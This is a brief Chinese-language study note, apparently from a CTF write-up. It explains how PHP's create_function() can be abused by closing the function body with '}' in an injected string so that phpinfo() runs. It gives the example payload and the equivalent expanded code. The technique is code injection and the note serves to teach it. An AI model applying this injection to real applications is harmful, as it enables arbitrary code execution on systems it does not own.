当看到 $ action($ arg,’’); 一个变量包含另一个变量时就想到了 creat_function()函数

    create_function函数是用来创建匿名函数的,他的两个参数的作用:create_function(参数,函数体)
    例: <?php $newfunc = create_function(‘$a’, ‘return $a;’); echo $newfunc(2) . “\n”;
    ?>
    下面进行漏洞利用,注入:
    <?php $newfunc = create_function(‘$a’, ‘return $a;}phpinfo();//‘);
    echo $newfunc(2) . “\n”;
    ?>
    相当于:
    <?php function newfunc($a){
    return $a;
    }
    phpinfo();//}
    >